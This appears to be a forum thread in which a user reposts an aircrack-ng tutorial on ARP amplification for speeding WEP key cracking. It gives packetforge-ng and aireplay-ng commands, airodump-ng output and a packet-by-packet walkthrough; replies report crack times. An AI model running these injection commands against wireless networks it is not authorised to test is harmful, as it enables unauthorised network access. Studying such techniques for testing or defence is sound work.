Tutorial: The art of ARP amplification

[-=Xploitz=-]

DOUBLE OR TRIPLE YOUR PPS!!!!!! (DATA, IVS')

Code:

http://aircrack-ng.org/doku.php?id=arp_amplification

Please post your test results here!


"""QUOTED TEXT FROM ABOVE LINK"""


This where things start to get interesting. By sending an ARP request to a live system, we can get the access point to generate two new IVs for each packet we inject. This increases the rate of data collection significantly.

This is a little harder then it sounds since we need to know an IP of a wired client attached to the LAN. As described in the introduction you can determine IPs via a variety of methods. So in the following I am using “192.168.1.1” as the destination IP. A critical item for success is to use “10.255.255.255” as the source IP. The source IP cannot be an IP already used in the LAN and it must be a valid network. You cannot use “255.255.255.255” like we do in many of our other examples.

We generate an ARP request to inject:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -k 192.168.1.1 -l 10.255.255.255 -y fragment-0608-132715.xor -w arp-request-2x.cap

We inject the packet:

aireplay-ng -2 -r arp-request-2x.cap ath0

We measure the packets per second with airodump-ng:

CH 9 ][ Elapsed: 8 s ][ 2007-06-08 14:12

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 38 100 107 10474 945 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 37 0 10921

As you can see above we achieve roughly 945 new data packets per second. This is a substantial increase over the first scenario.

Lets look at part of the capture. The arp-2x.cap is a representative subset of the full capture.

Use Wireshark to review the capture along with the following description. The easiest way is to use “View –> Expand”. Here is a description of the relevant packets:

*
Packet 1: Your standard beacon.
*
Packet 2: This is the packet we are injecting using aireplay-ng. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
*
Packet 3: The AP acknowledges the packet from the Aircrack-ng system.
*
Packet 4: The ARP request packet is broadcast by the AP. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
*
Packet 5: This is the ARP reply packet broadcast by the AP back to our system. This is a new data packet. You will notice that is has a new unique IV and a different sequence number. The source MAC is a wired client. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
*
Packets 6-9 are repeat of the cycle 2-5 above. This cycle would be repeated constantly.

If you count, there were two new IVs generated per cycle - packets 4 and 5.
Scenario Three - Three for one ARP packets

The final scenario is where we generate three new IV data packets for every one that we inject. This scenario is the hardest one to perform successfully. However, when successful, it achieves the highest injection rate.

In this case we need to know an IP of a wireless client attached currently associated with the access point. As described in the introduction you can determine IPs via a variety of methods. So in the following I am using “192.168.1.89” as the destination IP. A critical item for success is to use “10.255.255.255” as the source IP. The source IP cannot be an IP already used in the LAN and it must be a valid network. You cannot use “255.255.255.255” like we do in many of our other examples.

We generate an ARP request to inject:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -k 192.168.1.89 -l 10.255.255.255 -y fragment-0608-132715.xor -w arp-request-3x.cap

We inject the packet:

aireplay-ng -2 -r arp-request-3x.cap ath0

We measure the packets per second with airodump-ng:

CH 9 ][ Elapsed: 0 s ][ 2007-06-09 12:52

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 32 100 30 3797 1294 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:AB:CB:9D 47 0 1342
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 33 0 2641

As you can see above we achieve roughly 1294 new data packets per second. Wow! This is also a substantial increase over the first scenario. In the airodump-ng screen shot above there are two clients. Our attack system and the wireless client we are leveraging.

Lets look at part of the capture. The arp-3x.cap is a representative subset of the full capture.

Use Wireshark to review the capture along with the following description. The easiest way is to use “View –> Expand”. Here is a description of the relevant packets:

*
Packet 1: Your standard beacon.
*
Packet 2: This is the packet we are injecting using aireplay-ng. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
*
Packet 3: The AP acknowledges the packet from the Aircrack-ng system.
*
Packet 4: The ARP request packet is broadcast by the AP. This is a new data packet. You will notice that it has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
*
Packet 5: This is the ARP reply packet being sent by the wireless client to the AP. This is a new data packet. You will notice that is has a new unique IV and a different sequence number. The source MAC is the wireless client. Notice the DS Status flag is set to “TO DS” meaning from a wireless client going to the AP wired network.
*
Packet 6: The AP acknowledges the packet from the wireless client.
*
Packet 7: The ARP request packet from the wireless client is sent to the Aircrack-ng system by the AP. You can verify this by looking at the source and destination MAC addresses. This is a new data packet. You will notice that is has a new unique IV and a different sequence number. Notice the DS Status flag is set to “FROM DS” meaning from the wired network (AP) to a wireless client.
*
Packets 8-13 are repeat of the cycle 2-7 above. This cycle would be repeated constantly.

If you count, there were three new IVs generated per cycle - packets 4, 5 and 7.

[Baxter]

seems simple enough, thanks for the tut Xploitz.
will post some results when i get a chance.

[pureh@te]

so all that packet forging I was doing :is gonna come in handy testing this

[shamanvirtuel]

i try to implemente this in my new tool too.....

but i can't decide wich method for getting clients ip i will use....
any advice ?

could be really cool to have A.I.R injecting at 1200 pps..........

thx a lot xploitz

[pureh@te]

You should use nmap its incorparated into lots of tools. nessus,metasploit,nettools,wicrawl and a few others. trinity even used it in the Matrix movie to find a machine

[-=Xploitz=-]

Quote:

Originally Posted by purehate

so all that packet forging I was doing is gonna come in handy testing this

Told ya it wasn't a waste..although at the time it was VERY FUNNY!!!

Quote:

Originally Posted by shamanvirtuel

i try to implemente this in my new tool too.....

but i can't decide wich method for getting clients ip i will use....
any advice ?

could be really cool to have A.I.R injecting at 1200 pps..........

thx a lot xploitz

I haven't tested it out yet..and me and the aircrack forums aren't getting along. I was witch hunted, and because of a thread of mine I posted trying to learn how to do FAKE MAC internet connecting..Now I'm considered a "Black Hat Hacker"! Imagine that! ....Me, a freaking Black Hat Hacker!!!

[pureh@te]

You should have tried the netstumbler forums


Seriously thats kind of silly of them I've never joined thieir forums because the one aircrack problem I had I emailed matt bryne and he emailed me right back with the solution and said email him any time with questions

[andyem]

Actually Xploit, this is the method that consistently works for me no matter which type of router I am using. I'll try to use wireshark afterwards and post the results.

I usually get about 1mil per 25-30 minutes when the signal is very strong. Great write up

[-=Xploitz=-]

Quote:

Originally Posted by purehate

You should have tried the netstumbler forums

Yea, at least THERE they would have taken me by the hand and walked me through all the steps personally. And I'd been treated with great courtesy and respect, as well as having everything instantly explained in a clear and friendly manner as well.

Gotta love Mothers sarcasm

Quote:

Originally Posted by Mother

May I suggest the Netstumbler forums (http://www.netstumbler.org), where you will be treated with great courtesy and everything will be instantly explained in a clear and friendly manner.

[shamanvirtuel]

have you finally do somethin with arp ampli ? xploitz ?

the best results i have are not the best ones i see but i think it depends of cards.....i got max 750 (wich doubles my average inj speed wich is 350....)
i manage to crack my 128 in less than 1 min 30 including the frag attack !!!:

here the specs of attack
dest ip : ap ip
source ip : client ip
max inj rate : 1024 pps
card rate : 36 M (at 54 i get nothing at aireplay-ng test....)

here is the screen of airodump éééé



have a look at running time compare to IVs .....;

thx exploitz for pointing me out this method, inclusion in AIR in progress